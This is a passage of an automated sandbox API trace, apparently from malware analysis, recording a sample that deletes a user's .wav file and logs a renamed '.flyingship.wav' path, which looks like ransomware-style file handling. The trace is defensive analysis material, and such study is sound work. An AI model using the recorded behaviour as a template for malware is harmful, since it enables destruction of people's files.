lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x77bb, lpOverlapped=0x0) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.683] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.684] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.684] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.685] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.685] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.697] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.697] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0184.697] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.697] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.697] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.699] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.699] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.699] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0184.699] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.699] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", lpFilePart=0x0) returned 0x55 [0184.701] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x13562ec0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 0x90ae18 [0184.702] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\lftuly5i.wav")) returned 1 [0184.705] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f8b7f0, ftCreationTime.dwHighDateTime=0x1d5e216, ftLastAccessTime.dwLowDateTime=0x8a4c7a00, ftLastAccessTime.dwHighDateTime=0x1d5da34, ftLastWriteTime.dwLowDateTime=0x13562ec0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x77bb, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="LfTuLY5i.wav", cAlternateFileName="")) returned 0 [0184.705] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0184.705] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.706] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.706] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0184.706] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.706] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.706] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.706] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.707] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.707] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0184.707] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.707] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0184.707] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0184.709] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.709] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0184.709] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.709] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0184.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.710] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0184.710] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x21c1, lpOverlapped=0x0) returned 1 [0184.710] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0184.710] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x21c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.711] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0184.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0184.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav\r\n", cchWideChar=99, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 99 [0184.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x63) returned 0x8e8320 [0184.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav\r\n", cchWideChar=99, lpMultiByteStr=0x8e8320, cbMultiByte=99, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav\r\n", lpUsedDefaultChar=0x0) returned 99 [0184.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0184.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0184.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0184.711] WriteFile (in: hFile=0x138, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x62, lpOverlapped=0x0) returned 1 [0184.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0184.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.711] CloseHandle (hObject=0x138) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0184.715] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0184.715] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0184.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0184.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0184.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.717] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0184.717] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.717] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.717] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0184.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0184.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0184.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0184.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8e8 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0184.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0184.718] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 